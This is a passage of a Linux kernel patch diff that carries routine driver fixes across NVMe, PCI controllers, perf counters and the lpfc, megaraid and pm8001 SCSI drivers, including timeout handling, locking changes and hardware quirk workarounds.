++	err = skb_cow_head(skb, MT_SDIO_TXD_SIZE + MT_SDIO_HDR_SIZE);
++	if (err)
++		return err;
++
+ 	if (!wcid)
+ 		wcid = &dev->mt76.global_wcid;
+ 
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index fd73db8a535d8..25ddfabc58f73 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -2368,25 +2368,8 @@ int nvme_enable_ctrl(struct nvme_ctrl *ctrl)
+ 	else
+ 		ctrl->ctrl_config = NVME_CC_CSS_NVM;
+ 
+-	if (ctrl->cap & NVME_CAP_CRMS_CRWMS) {
+-		u32 crto;
+-
+-		ret = ctrl->ops->reg_read32(ctrl, NVME_REG_CRTO, &crto);
+-		if (ret) {
+-			dev_err(ctrl->device, "Reading CRTO failed (%d)\n",
+-				ret);
+-			return ret;
+-		}
+-
+-		if (ctrl->cap & NVME_CAP_CRMS_CRIMS) {
+-			ctrl->ctrl_config |= NVME_CC_CRIME;
+-			timeout = NVME_CRTO_CRIMT(crto);
+-		} else {
+-			timeout = NVME_CRTO_CRWMT(crto);
+-		}
+-	} else {
+-		timeout = NVME_CAP_TIMEOUT(ctrl->cap);
+-	}
++	if (ctrl->cap & NVME_CAP_CRMS_CRWMS && ctrl->cap & NVME_CAP_CRMS_CRIMS)
++		ctrl->ctrl_config |= NVME_CC_CRIME;
+ 
+ 	ctrl->ctrl_config |= (NVME_CTRL_PAGE_SHIFT - 12) << NVME_CC_MPS_SHIFT;
+ 	ctrl->ctrl_config |= NVME_CC_AMS_RR | NVME_CC_SHN_NONE;
+@@ -2400,6 +2383,39 @@ int nvme_enable_ctrl(struct nvme_ctrl *ctrl)
+ 	if (ret)
+ 		return ret;
+ 
++	/* CAP value may change after initial CC write */
++	ret = ctrl->ops->reg_read64(ctrl, NVME_REG_CAP, &ctrl->cap);
++	if (ret)
++		return ret;
++
++	timeout = NVME_CAP_TIMEOUT(ctrl->cap);
++	if (ctrl->cap & NVME_CAP_CRMS_CRWMS) {
++		u32 crto, ready_timeout;
++
++		ret = ctrl->ops->reg_read32(ctrl, NVME_REG_CRTO, &crto);
++		if (ret) {
++			dev_err(ctrl->device, "Reading CRTO failed (%d)\n",
++				ret);
++			return ret;
++		}
++
++		/*
++		 * CRTO should always be greater than or equal to CAP.TO, but
++		 * some devices are known to get this wrong. Use the larger of
++		 * the two values.
++		 */
++		if (ctrl->ctrl_config & NVME_CC_CRIME)
++			ready_timeout = NVME_CRTO_CRIMT(crto);
++		else
++			ready_timeout = NVME_CRTO_CRWMT(crto);
++
++		if (ready_timeout < timeout)
++			dev_warn_once(ctrl->device, "bad crto:%x cap:%llx\n",
++				      crto, ctrl->cap);
++		else
++			timeout = ready_timeout;
++	}
++
+ 	ctrl->ctrl_config |= NVME_CC_ENABLE;
+ 	ret = ctrl->ops->reg_write32(ctrl, NVME_REG_CC, ctrl->ctrl_config);
+ 	if (ret)
+diff --git a/drivers/nvme/target/io-cmd-file.c b/drivers/nvme/target/io-cmd-file.c
+index 871c4f32f443f..2d068439b129c 100644
+--- a/drivers/nvme/target/io-cmd-file.c
++++ b/drivers/nvme/target/io-cmd-file.c
+@@ -73,13 +73,6 @@ err:
+ 	return ret;
+ }
+ 
+-static void nvmet_file_init_bvec(struct bio_vec *bv, struct scatterlist *sg)
+-{
+-	bv->bv_page = sg_page(sg);
+-	bv->bv_offset = sg->offset;
+-	bv->bv_len = sg->length;
+-}
+-
+ static ssize_t nvmet_file_submit_bvec(struct nvmet_req *req, loff_t pos,
+ 		unsigned long nr_segs, size_t count, int ki_flags)
+ {
+@@ -146,7 +139,8 @@ static bool nvmet_file_execute_io(struct nvmet_req *req, int ki_flags)
+ 
+ 	memset(&req->f.iocb, 0, sizeof(struct kiocb));
+ 	for_each_sg(req->sg, sg, req->sg_cnt, i) {
+-		nvmet_file_init_bvec(&req->f.bvec[bv_cnt], sg);
++		bvec_set_page(&req->f.bvec[bv_cnt], sg_page(sg), sg->length,
++			      sg->offset);
+ 		len += req->f.bvec[bv_cnt].bv_len;
+ 		total_len += req->f.bvec[bv_cnt].bv_len;
+ 		bv_cnt++;
+diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
+index cc05c094de221..5e29da94f72d6 100644
+--- a/drivers/nvme/target/tcp.c
++++ b/drivers/nvme/target/tcp.c
+@@ -321,9 +321,8 @@ static void nvmet_tcp_build_pdu_iovec(struct nvmet_tcp_cmd *cmd)
+ 	while (length) {
+ 		u32 iov_len = min_t(u32, length, sg->length - sg_offset);
+ 
+-		iov->bv_page = sg_page(sg);
+-		iov->bv_len = sg->length;
+-		iov->bv_offset = sg->offset + sg_offset;
++		bvec_set_page(iov, sg_page(sg), iov_len,
++				sg->offset + sg_offset);
+ 
+ 		length -= iov_len;
+ 		sg = sg_next(sg);
+diff --git a/drivers/pci/controller/dwc/pci-imx6.c b/drivers/pci/controller/dwc/pci-imx6.c
+index 47db2d20568ef..388354a8e31cf 100644
+--- a/drivers/pci/controller/dwc/pci-imx6.c
++++ b/drivers/pci/controller/dwc/pci-imx6.c
+@@ -999,6 +999,7 @@ static void imx6_pcie_host_exit(struct dw_pcie_rp *pp)
+ 
+ static const struct dw_pcie_host_ops imx6_pcie_host_ops = {
+ 	.host_init = imx6_pcie_host_init,
++	.host_deinit = imx6_pcie_host_exit,
+ };
+ 
+ static const struct dw_pcie_ops dw_pcie_ops = {
+diff --git a/drivers/pci/controller/dwc/pcie-fu740.c b/drivers/pci/controller/dwc/pcie-fu740.c
+index 0c90583c078bf..1e9b44b8bba48 100644
+--- a/drivers/pci/controller/dwc/pcie-fu740.c
++++ b/drivers/pci/controller/dwc/pcie-fu740.c
+@@ -299,6 +299,7 @@ static int fu740_pcie_probe(struct platform_device *pdev)
+ 	pci->dev = dev;
+ 	pci->ops = &dw_pcie_ops;
+ 	pci->pp.ops = &fu740_pcie_host_ops;
++	pci->pp.num_vectors = MAX_MSI_IRQS;
+ 
+ 	/* SiFive specific region: mgmt */
+ 	afp->mgmt_base = devm_platform_ioremap_resource_byname(pdev, "mgmt");
+diff --git a/drivers/pci/controller/vmd.c b/drivers/pci/controller/vmd.c
+index d1eb17e3f1474..d4c9b888a79d7 100644
+--- a/drivers/pci/controller/vmd.c
++++ b/drivers/pci/controller/vmd.c
+@@ -526,8 +526,23 @@ static void vmd_domain_reset(struct vmd_dev *vmd)
+ 				     PCI_CLASS_BRIDGE_PCI))
+ 					continue;
+ 
+-				memset_io(base + PCI_IO_BASE, 0,
+-					  PCI_ROM_ADDRESS1 - PCI_IO_BASE);
++				/*
++				 * Temporarily disable the I/O range before updating
++				 * PCI_IO_BASE.
++				 */
++				writel(0x0000ffff, base + PCI_IO_BASE_UPPER16);
++				/* Update lower 16 bits of I/O base/limit */
++				writew(0x00f0, base + PCI_IO_BASE);
++				/* Update upper 16 bits of I/O base/limit */
++				writel(0, base + PCI_IO_BASE_UPPER16);
++
++				/* MMIO Base/Limit */
++				writel(0x0000fff0, base + PCI_MEMORY_BASE);
++
++				/* Prefetchable MMIO Base/Limit */
++				writel(0, base + PCI_PREF_LIMIT_UPPER32);
++				writel(0x0000fff0, base + PCI_PREF_MEMORY_BASE);
++				writel(0xffffffff, base + PCI_PREF_BASE_UPPER32);
+ 			}
+ 		}
+ 	}
+diff --git a/drivers/perf/arm_smmuv3_pmu.c b/drivers/perf/arm_smmuv3_pmu.c
+index 25a269d431e45..0e17c57ddb876 100644
+--- a/drivers/perf/arm_smmuv3_pmu.c
++++ b/drivers/perf/arm_smmuv3_pmu.c
+@@ -115,6 +115,7 @@
+ #define SMMU_PMCG_PA_SHIFT              12
+ 
+ #define SMMU_PMCG_EVCNTR_RDONLY         BIT(0)
++#define SMMU_PMCG_HARDEN_DISABLE        BIT(1)
+ 
+ static int cpuhp_state_num;
+ 
+@@ -159,6 +160,20 @@ static inline void smmu_pmu_enable(struct pmu *pmu)
+ 	writel(SMMU_PMCG_CR_ENABLE, smmu_pmu->reg_base + SMMU_PMCG_CR);
+ }
+ 
++static int smmu_pmu_apply_event_filter(struct smmu_pmu *smmu_pmu,
++				       struct perf_event *event, int idx);
++
++static inline void smmu_pmu_enable_quirk_hip08_09(struct pmu *pmu)
++{
++	struct smmu_pmu *smmu_pmu = to_smmu_pmu(pmu);
++	unsigned int idx;
++
++	for_each_set_bit(idx, smmu_pmu->used_counters, smmu_pmu->num_counters)
++		smmu_pmu_apply_event_filter(smmu_pmu, smmu_pmu->events[idx], idx);
++
++	smmu_pmu_enable(pmu);
++}
++
+ static inline void smmu_pmu_disable(struct pmu *pmu)
+ {
+ 	struct smmu_pmu *smmu_pmu = to_smmu_pmu(pmu);
+@@ -167,6 +182,22 @@ static inline void smmu_pmu_disable(struct pmu *pmu)
+ 	writel(0, smmu_pmu->reg_base + SMMU_PMCG_IRQ_CTRL);
+ }
+ 
++static inline void smmu_pmu_disable_quirk_hip08_09(struct pmu *pmu)
++{
++	struct smmu_pmu *smmu_pmu = to_smmu_pmu(pmu);
++	unsigned int idx;
++
++	/*
++	 * The global disable of the PMU sometimes fails to stop the counting.
++	 * Harden this by writing an invalid event type to each used counter
++	 * to forcibly stop counting.
++	 */
++	for_each_set_bit(idx, smmu_pmu->used_counters, smmu_pmu->num_counters)
++		writel(0xffff, smmu_pmu->reg_base + SMMU_PMCG_EVTYPER(idx));
++
++	smmu_pmu_disable(pmu);
++}
++
+ static inline void smmu_pmu_counter_set_value(struct smmu_pmu *smmu_pmu,
+ 					      u32 idx, u64 value)
+ {
+@@ -765,7 +796,10 @@ static void smmu_pmu_get_acpi_options(struct smmu_pmu *smmu_pmu)
+ 	switch (model) {
+ 	case IORT_SMMU_V3_PMCG_HISI_HIP08:
+ 		/* HiSilicon Erratum 162001800 */
+-		smmu_pmu->options |= SMMU_PMCG_EVCNTR_RDONLY;
++		smmu_pmu->options |= SMMU_PMCG_EVCNTR_RDONLY | SMMU_PMCG_HARDEN_DISABLE;
++		break;
++	case IORT_SMMU_V3_PMCG_HISI_HIP09:
++		smmu_pmu->options |= SMMU_PMCG_HARDEN_DISABLE;
+ 		break;
+ 	}
+ 
+@@ -890,6 +924,16 @@ static int smmu_pmu_probe(struct platform_device *pdev)
+ 	if (!dev->of_node)
+ 		smmu_pmu_get_acpi_options(smmu_pmu);
+ 
++	/*
++	 * For platforms that suffer this quirk, the PMU disable sometimes
++	 * fails to stop the counters. This leads to inaccurate or erroneous
++	 * counting. Forcibly disable the counters with this quirk handler.
++	 */
++	if (smmu_pmu->options & SMMU_PMCG_HARDEN_DISABLE) {
++		smmu_pmu->pmu.pmu_enable = smmu_pmu_enable_quirk_hip08_09;
++		smmu_pmu->pmu.pmu_disable = smmu_pmu_disable_quirk_hip08_09;
++	}
++
+ 	/* Pick one CPU to be the preferred one to use */
+ 	smmu_pmu->on_cpu = raw_smp_processor_id();
+ 	WARN_ON(irq_set_affinity(smmu_pmu->irq, cpumask_of(smmu_pmu->on_cpu)));
+diff --git a/drivers/perf/fsl_imx8_ddr_perf.c b/drivers/perf/fsl_imx8_ddr_perf.c
+index cd4ce2b4906d1..a4cda73b81c9f 100644
+--- a/drivers/perf/fsl_imx8_ddr_perf.c
++++ b/drivers/perf/fsl_imx8_ddr_perf.c
+@@ -28,6 +28,8 @@
+ #define CNTL_CLEAR_MASK		0xFFFFFFFD
+ #define CNTL_OVER_MASK		0xFFFFFFFE
+ 
++#define CNTL_CP_SHIFT		16
++#define CNTL_CP_MASK		(0xFF << CNTL_CP_SHIFT)
+ #define CNTL_CSV_SHIFT		24
+ #define CNTL_CSV_MASK		(0xFFU << CNTL_CSV_SHIFT)
+ 
+@@ -35,6 +37,8 @@
+ #define EVENT_CYCLES_COUNTER	0
+ #define NUM_COUNTERS		4
+ 
++/* For removing bias if cycle counter CNTL.CP is set to 0xf0 */
++#define CYCLES_COUNTER_MASK	0x0FFFFFFF
+ #define AXI_MASKING_REVERT	0xffff0000	/* AXI_MASKING(MSB 16bits) + AXI_ID(LSB 16bits) */
+ 
+ #define to_ddr_pmu(p)		container_of(p, struct ddr_pmu, pmu)
+@@ -429,6 +433,17 @@ static void ddr_perf_counter_enable(struct ddr_pmu *pmu, int config,
+ 		writel(0, pmu->base + reg);
+ 		val = CNTL_EN | CNTL_CLEAR;
+ 		val |= FIELD_PREP(CNTL_CSV_MASK, config);
++
++		/*
++		 * On i.MX8MP we need to bias the cycle counter to overflow more often.
++		 * We do this by initializing bits [23:16] of the counter value via the
++		 * COUNTER_CTRL Counter Parameter (CP) field.
++		 */
++		if (pmu->devtype_data->quirks & DDR_CAP_AXI_ID_FILTER_ENHANCED) {
++			if (counter == EVENT_CYCLES_COUNTER)
++				val |= FIELD_PREP(CNTL_CP_MASK, 0xf0);
++		}
++
+ 		writel(val, pmu->base + reg);
+ 	} else {
+ 		/* Disable counter */
+@@ -468,6 +483,12 @@ static void ddr_perf_event_update(struct perf_event *event)
+ 	int ret;
+ 
+ 	new_raw_count = ddr_perf_read_counter(pmu, counter);
++	/* Remove the bias applied in ddr_perf_counter_enable(). */
++	if (pmu->devtype_data->quirks & DDR_CAP_AXI_ID_FILTER_ENHANCED) {
++		if (counter == EVENT_CYCLES_COUNTER)
++			new_raw_count &= CYCLES_COUNTER_MASK;
++	}
++
+ 	local64_add(new_raw_count, &event->count);
+ 
+ 	/*
+diff --git a/drivers/scsi/lpfc/lpfc.h b/drivers/scsi/lpfc/lpfc.h
+index 9ad233b40a9e2..664ac3069c4be 100644
+--- a/drivers/scsi/lpfc/lpfc.h
++++ b/drivers/scsi/lpfc/lpfc.h
+@@ -895,6 +895,7 @@ enum lpfc_irq_chann_mode {
+ enum lpfc_hba_bit_flags {
+ 	FABRIC_COMANDS_BLOCKED,
+ 	HBA_PCI_ERR,
++	MBX_TMO_ERR,
+ };
+ 
+ struct lpfc_hba {
+diff --git a/drivers/scsi/lpfc/lpfc_debugfs.c b/drivers/scsi/lpfc/lpfc_debugfs.c
+index 3e365e5e194a2..250d423710ca4 100644
+--- a/drivers/scsi/lpfc/lpfc_debugfs.c
++++ b/drivers/scsi/lpfc/lpfc_debugfs.c
+@@ -6069,7 +6069,7 @@ lpfc_debugfs_initialize(struct lpfc_vport *vport)
+ 					    phba->hba_debugfs_root,
+ 					    phba,
+ 					    &lpfc_debugfs_op_multixripools);
+-		if (!phba->debug_multixri_pools) {
++		if (IS_ERR(phba->debug_multixri_pools)) {
+ 			lpfc_printf_vlog(vport, KERN_ERR, LOG_INIT,
+ 					 "0527 Cannot create debugfs multixripools\n");
+ 			goto debug_failed;
+@@ -6081,7 +6081,7 @@ lpfc_debugfs_initialize(struct lpfc_vport *vport)
+ 			debugfs_create_file(name, S_IFREG | 0644,
+ 					    phba->hba_debugfs_root,
+ 					    phba, &lpfc_cgn_buffer_op);
+-		if (!phba->debug_cgn_buffer) {
++		if (IS_ERR(phba->debug_cgn_buffer)) {
+ 			lpfc_printf_vlog(vport, KERN_ERR, LOG_INIT,
+ 					 "6527 Cannot create debugfs "
+ 					 "cgn_buffer\n");
+@@ -6094,7 +6094,7 @@ lpfc_debugfs_initialize(struct lpfc_vport *vport)
+ 			debugfs_create_file(name, S_IFREG | 0644,
+ 					    phba->hba_debugfs_root,
+ 					    phba, &lpfc_rx_monitor_op);
+-		if (!phba->debug_rx_monitor) {
++		if (IS_ERR(phba->debug_rx_monitor)) {
+ 			lpfc_printf_vlog(vport, KERN_ERR, LOG_INIT,
+ 					 "6528 Cannot create debugfs "
+ 					 "rx_monitor\n");
+@@ -6107,7 +6107,7 @@ lpfc_debugfs_initialize(struct lpfc_vport *vport)
+ 			debugfs_create_file(name, 0644,
+ 					    phba->hba_debugfs_root,
+ 					    phba, &lpfc_debugfs_ras_log);
+-		if (!phba->debug_ras_log) {
++		if (IS_ERR(phba->debug_ras_log)) {
+ 			lpfc_printf_vlog(vport, KERN_ERR, LOG_INIT,
+ 					 "6148 Cannot create debugfs"
+ 					 " ras_log\n");
+@@ -6128,7 +6128,7 @@ lpfc_debugfs_initialize(struct lpfc_vport *vport)
+ 			debugfs_create_file(name, S_IFREG | 0644,
+ 					    phba->hba_debugfs_root,
+ 					    phba, &lpfc_debugfs_op_lockstat);
+-		if (!phba->debug_lockstat) {
++		if (IS_ERR(phba->debug_lockstat)) {
+ 			lpfc_printf_vlog(vport, KERN_ERR, LOG_INIT,
+ 					 "4610 Can't create debugfs lockstat\n");
+ 			goto debug_failed;
+@@ -6354,7 +6354,7 @@ nvmeio_off:
+ 		debugfs_create_file(name, 0644,
+ 				    vport->vport_debugfs_root,
+ 				    vport, &lpfc_debugfs_op_scsistat);
+-	if (!vport->debug_scsistat) {
++	if (IS_ERR(vport->debug_scsistat)) {
+ 		lpfc_printf_vlog(vport, KERN_ERR, LOG_INIT,
+ 				 "4611 Cannot create debugfs scsistat\n");
+ 		goto debug_failed;
+@@ -6365,7 +6365,7 @@ nvmeio_off:
+ 		debugfs_create_file(name, 0644,
+ 				    vport->vport_debugfs_root,
+ 				    vport, &lpfc_debugfs_op_ioktime);
+-	if (!vport->debug_ioktime) {
++	if (IS_ERR(vport->debug_ioktime)) {
+ 		lpfc_printf_vlog(vport, KERN_ERR, LOG_INIT,
+ 				 "0815 Cannot create debugfs ioktime\n");
+ 		goto debug_failed;
+diff --git a/drivers/scsi/lpfc/lpfc_els.c b/drivers/scsi/lpfc/lpfc_els.c
+index 43ebb41ded593..6b5ce9869e6b4 100644
+--- a/drivers/scsi/lpfc/lpfc_els.c
++++ b/drivers/scsi/lpfc/lpfc_els.c
+@@ -9410,11 +9410,13 @@ void
+ lpfc_els_flush_cmd(struct lpfc_vport *vport)
+ {
+ 	LIST_HEAD(abort_list);
++	LIST_HEAD(cancel_list);
+ 	struct lpfc_hba  *phba = vport->phba;
+ 	struct lpfc_sli_ring *pring;
+ 	struct lpfc_iocbq *tmp_iocb, *piocb;
+ 	u32 ulp_command;
+ 	unsigned long iflags = 0;
++	bool mbx_tmo_err;
+ 
+ 	lpfc_fabric_abort_vport(vport);
+ 
+@@ -9436,15 +9438,16 @@ lpfc_els_flush_cmd(struct lpfc_vport *vport)
+ 	if (phba->sli_rev == LPFC_SLI_REV4)
+ 		spin_lock(&pring->ring_lock);
+ 
++	mbx_tmo_err = test_bit(MBX_TMO_ERR, &phba->bit_flags);
+ 	/* First we need to issue aborts to outstanding cmds on txcmpl */
+ 	list_for_each_entry_safe(piocb, tmp_iocb, &pring->txcmplq, list) {
+-		if (piocb->cmd_flag & LPFC_IO_LIBDFC)
++		if (piocb->cmd_flag & LPFC_IO_LIBDFC && !mbx_tmo_err)
+ 			continue;
+ 
+ 		if (piocb->vport != vport)
+ 			continue;
+ 
+-		if (piocb->cmd_flag & LPFC_DRIVER_ABORTED)
++		if (piocb->cmd_flag & LPFC_DRIVER_ABORTED && !mbx_tmo_err)
+ 			continue;
+ 
+ 		/* On the ELS ring we can have ELS_REQUESTs or
+@@ -9463,8 +9466,8 @@ lpfc_els_flush_cmd(struct lpfc_vport *vport)
+ 			 */
+ 			if (phba->link_state == LPFC_LINK_DOWN)
+ 				piocb->cmd_cmpl = lpfc_cmpl_els_link_down;
+-		}
+-		if (ulp_command == CMD_GEN_REQUEST64_CR)
++		} else if (ulp_command == CMD_GEN_REQUEST64_CR ||
++			   mbx_tmo_err)
+ 			list_add_tail(&piocb->dlist, &abort_list);
+ 	}
+ 
+@@ -9476,11 +9479,19 @@ lpfc_els_flush_cmd(struct lpfc_vport *vport)
+ 	list_for_each_entry_safe(piocb, tmp_iocb, &abort_list, dlist) {
+ 		spin_lock_irqsave(&phba->hbalock, iflags);
+ 		list_del_init(&piocb->dlist);
+-		lpfc_sli_issue_abort_iotag(phba, pring, piocb, NULL);
++		if (mbx_tmo_err)
++			list_move_tail(&piocb->list, &cancel_list);
++		else
++			lpfc_sli_issue_abort_iotag(phba, pring, piocb, NULL);
++
+ 		spin_unlock_irqrestore(&phba->hbalock, iflags);
+ 	}
+-	/* Make sure HBA is alive */
+-	lpfc_issue_hb_tmo(phba);
++	if (!list_empty(&cancel_list))
++		lpfc_sli_cancel_iocbs(phba, &cancel_list, IOSTAT_LOCAL_REJECT,
++				      IOERR_SLI_ABORTED);
++	else
++		/* Make sure HBA is alive */
++		lpfc_issue_hb_tmo(phba);
+ 
+ 	if (!list_empty(&abort_list))
+ 		lpfc_printf_vlog(vport, KERN_ERR, LOG_TRACE_EVENT,
+diff --git a/drivers/scsi/lpfc/lpfc_init.c b/drivers/scsi/lpfc/lpfc_init.c
+index d54fd153cb115..f59de61803dc8 100644
+--- a/drivers/scsi/lpfc/lpfc_init.c
++++ b/drivers/scsi/lpfc/lpfc_init.c
+@@ -7563,6 +7563,8 @@ lpfc_disable_pci_dev(struct lpfc_hba *phba)
+ void
+ lpfc_reset_hba(struct lpfc_hba *phba)
+ {
++	int rc = 0;
++
+ 	/* If resets are disabled then set error state and return. */
+ 	if (!phba->cfg_enable_hba_reset) {
+ 		phba->link_state = LPFC_HBA_ERROR;
+@@ -7573,13 +7575,25 @@ lpfc_reset_hba(struct lpfc_hba *phba)
+ 	if (phba->sli.sli_flag & LPFC_SLI_ACTIVE) {
+ 		lpfc_offline_prep(phba, LPFC_MBX_WAIT);
+ 	} else {
++		if (test_bit(MBX_TMO_ERR, &phba->bit_flags)) {
++			/* Perform a PCI function reset to start from clean */
++			rc = lpfc_pci_function_reset(phba);
++			lpfc_els_flush_all_cmd(phba);
++		}
+ 		lpfc_offline_prep(phba, LPFC_MBX_NO_WAIT);
+ 		lpfc_sli_flush_io_rings(phba);
+ 	}
+ 	lpfc_offline(phba);
+-	lpfc_sli_brdrestart(phba);
+-	lpfc_online(phba);
+-	lpfc_unblock_mgmt_io(phba);
++	clear_bit(MBX_TMO_ERR, &phba->bit_flags);
++	if (unlikely(rc)) {
++		lpfc_printf_log(phba, KERN_ERR, LOG_SLI,
++				"8888 PCI function reset failed rc %x\n",
++				rc);
++	} else {
++		lpfc_sli_brdrestart(phba);
++		lpfc_online(phba);
++		lpfc_unblock_mgmt_io(phba);
++	}
+ }
+ 
+ /**
+diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
+index b44bb3ae22ad9..427a6ac803e50 100644
+--- a/drivers/scsi/lpfc/lpfc_sli.c
++++ b/drivers/scsi/lpfc/lpfc_sli.c
+@@ -3919,6 +3919,8 @@ void lpfc_poll_eratt(struct timer_list *t)
+ 	uint64_t sli_intr, cnt;
+ 
+ 	phba = from_timer(phba, t, eratt_poll);
++	if (!(phba->hba_flag & HBA_SETUP))
++		return;
+ 
+ 	/* Here we will also keep track of interrupts per sec of the hba */
+ 	sli_intr = phba->sli.slistat.sli_intr;
+@@ -7712,7 +7714,9 @@ lpfc_sli4_repost_sgl_list(struct lpfc_hba *phba,
+ 		spin_unlock_irq(&phba->hbalock);
+ 	} else {
+ 		lpfc_printf_log(phba, KERN_ERR, LOG_TRACE_EVENT,
+-				"3161 Failure to post sgl to port.\n");
++				"3161 Failure to post sgl to port,status %x "
++				"blkcnt %d totalcnt %d postcnt %d\n",
++				status, block_cnt, total_cnt, post_cnt);
+ 		return -EIO;
+ 	}
+ 
+@@ -8495,6 +8499,7 @@ lpfc_sli4_hba_setup(struct lpfc_hba *phba)
+ 			spin_unlock_irq(&phba->hbalock);
+ 		}
+ 	}
++	phba->hba_flag &= ~HBA_SETUP;
+ 
+ 	lpfc_sli4_dip(phba);
+ 
+@@ -9317,6 +9322,7 @@ lpfc_mbox_timeout_handler(struct lpfc_hba *phba)
+ 	 * would get IOCB_ERROR from lpfc_sli_issue_iocb, allowing
+ 	 * it to fail all outstanding SCSI IO.
+ 	 */
++	set_bit(MBX_TMO_ERR, &phba->bit_flags);
+ 	spin_lock_irq(&phba->pport->work_port_lock);
+ 	phba->pport->work_port_events &= ~WORKER_MBOX_TMO;
+ 	spin_unlock_irq(&phba->pport->work_port_lock);
+diff --git a/drivers/scsi/megaraid/megaraid_sas.h b/drivers/scsi/megaraid/megaraid_sas.h
+index 2ef9d41fc6f42..e5215db9ee4d1 100644
+--- a/drivers/scsi/megaraid/megaraid_sas.h
++++ b/drivers/scsi/megaraid/megaraid_sas.h
+@@ -2332,7 +2332,7 @@ struct megasas_instance {
+ 	u32 support_morethan256jbod; /* FW support for more than 256 PD/JBOD */
+ 	bool use_seqnum_jbod_fp;   /* Added for PD sequence */
+ 	bool smp_affinity_enable;
+-	spinlock_t crashdump_lock;
++	struct mutex crashdump_lock;
+ 
+ 	struct megasas_register_set __iomem *reg_set;
+ 	u32 __iomem *reply_post_host_index_addr[MR_MAX_MSIX_REG_ARRAY];
+diff --git a/drivers/scsi/megaraid/megaraid_sas_base.c b/drivers/scsi/megaraid/megaraid_sas_base.c
+index 13ee8e4c4f570..e392a984c7b87 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_base.c
++++ b/drivers/scsi/megaraid/megaraid_sas_base.c
+@@ -3272,14 +3272,13 @@ fw_crash_buffer_store(struct device *cdev,
+ 	struct megasas_instance *instance =
+ 		(struct megasas_instance *) shost->hostdata;
+ 	int val = 0;
+-	unsigned long flags;
+ 
+ 	if (kstrtoint(buf, 0, &val) != 0)
+ 		return -EINVAL;
+ 
+-	spin_lock_irqsave(&instance->crashdump_lock, flags);
++	mutex_lock(&instance->crashdump_lock);
+ 	instance->fw_crash_buffer_offset = val;
+-	spin_unlock_irqrestore(&instance->crashdump_lock, flags);
++	mutex_unlock(&instance->crashdump_lock);
+ 	return strlen(buf);
+ }
+ 
+@@ -3294,24 +3293,23 @@ fw_crash_buffer_show(struct device *cdev,
+ 	unsigned long dmachunk = CRASH_DMA_BUF_SIZE;
+ 	unsigned long chunk_left_bytes;
+ 	unsigned long src_addr;
+-	unsigned long flags;
+ 	u32 buff_offset;
+ 
+-	spin_lock_irqsave(&instance->crashdump_lock, flags);
++	mutex_lock(&instance->crashdump_lock);
+ 	buff_offset = instance->fw_crash_buffer_offset;
+ 	if (!instance->crash_dump_buf ||
+ 		!((instance->fw_crash_state == AVAILABLE) ||
+ 		(instance->fw_crash_state == COPYING))) {
+ 		dev_err(&instance->pdev->dev,
+ 			"Firmware crash dump is not available\n");
+-		spin_unlock_irqrestore(&instance->crashdump_lock, flags);
++		mutex_unlock(&instance->crashdump_lock);
+ 		return -EINVAL;
+ 	}
+ 
+ 	if (buff_offset > (instance->fw_crash_buffer_size * dmachunk)) {
+ 		dev_err(&instance->pdev->dev,
+ 			"Firmware crash dump offset is out of range\n");
+-		spin_unlock_irqrestore(&instance->crashdump_lock, flags);
++		mutex_unlock(&instance->crashdump_lock);
+ 		return 0;
+ 	}
+ 
+@@ -3323,7 +3321,7 @@ fw_crash_buffer_show(struct device *cdev,
+ 	src_addr = (unsigned long)instance->crash_buf[buff_offset / dmachunk] +
+ 		(buff_offset % dmachunk);
+ 	memcpy(buf, (void *)src_addr, size);
+-	spin_unlock_irqrestore(&instance->crashdump_lock, flags);
++	mutex_unlock(&instance->crashdump_lock);
+ 
+ 	return size;
+ }
+@@ -3348,7 +3346,6 @@ fw_crash_state_store(struct device *cdev,
+ 	struct megasas_instance *instance =
+ 		(struct megasas_instance *) shost->hostdata;
+ 	int val = 0;
+-	unsigned long flags;
+ 
+ 	if (kstrtoint(buf, 0, &val) != 0)
+ 		return -EINVAL;
+@@ -3362,9 +3359,9 @@ fw_crash_state_store(struct device *cdev,
+ 	instance->fw_crash_state = val;
+ 
+ 	if ((val == COPIED) || (val == COPY_ERROR)) {
+-		spin_lock_irqsave(&instance->crashdump_lock, flags);
++		mutex_lock(&instance->crashdump_lock);
+ 		megasas_free_host_crash_buffer(instance);
+-		spin_unlock_irqrestore(&instance->crashdump_lock, flags);
++		mutex_unlock(&instance->crashdump_lock);
+ 		if (val == COPY_ERROR)
+ 			dev_info(&instance->pdev->dev, "application failed to "
+ 				"copy Firmware crash dump\n");
+@@ -7423,7 +7420,7 @@ static inline void megasas_init_ctrl_params(struct megasas_instance *instance)
+ 	init_waitqueue_head(&instance->int_cmd_wait_q);
+ 	init_waitqueue_head(&instance->abort_cmd_wait_q);
+ 
+-	spin_lock_init(&instance->crashdump_lock);
++	mutex_init(&instance->crashdump_lock);
+ 	spin_lock_init(&instance->mfi_pool_lock);
+ 	spin_lock_init(&instance->hba_lock);
+ 	spin_lock_init(&instance->stream_lock);
+diff --git a/drivers/scsi/pm8001/pm8001_init.c b/drivers/scsi/pm8001/pm8001_init.c
+index 7a7d63aa90e21..da65234add432 100644
+--- a/drivers/scsi/pm8001/pm8001_init.c
++++ b/drivers/scsi/pm8001/pm8001_init.c
+@@ -274,7 +274,6 @@ static irqreturn_t pm8001_interrupt_handler_intx(int irq, void *dev_id)
+ 	return ret;
+ }
+ 
+-static u32 pm8001_setup_irq(struct pm8001_hba_info *pm8001_ha);
+ static u32 pm8001_request_irq(struct pm8001_hba_info *pm8001_ha);
+ 
+ /**
+@@ -295,13 +294,6 @@ static int pm8001_alloc(struct pm8001_hba_info *pm8001_ha,
+ 	pm8001_dbg(pm8001_ha, INIT, "pm8001_alloc: PHY:%x\n",
+ 		   pm8001_ha->chip->n_phy);
+ 
+-	/* Setup Interrupt */
+-	rc = pm8001_setup_irq(pm8001_ha);
+-	if (rc) {
+-		pm8001_dbg(pm8001_ha, FAIL,
+-			   "pm8001_setup_irq failed [ret: %d]\n", rc);
+-		goto err_out;
+-	}
+ 	/* Request Interrupt */
+ 	rc = pm8001_request_irq(pm8001_ha);
+ 	if (rc)
+@@ -1021,47 +1013,38 @@ static u32 pm8001_request_msix(struct pm8001_hba_info *pm8001_ha)
+ }
+ #endif
+ 
+-static u32 pm8001_setup_irq(struct pm8001_hba_info *pm8001_ha)
+-{
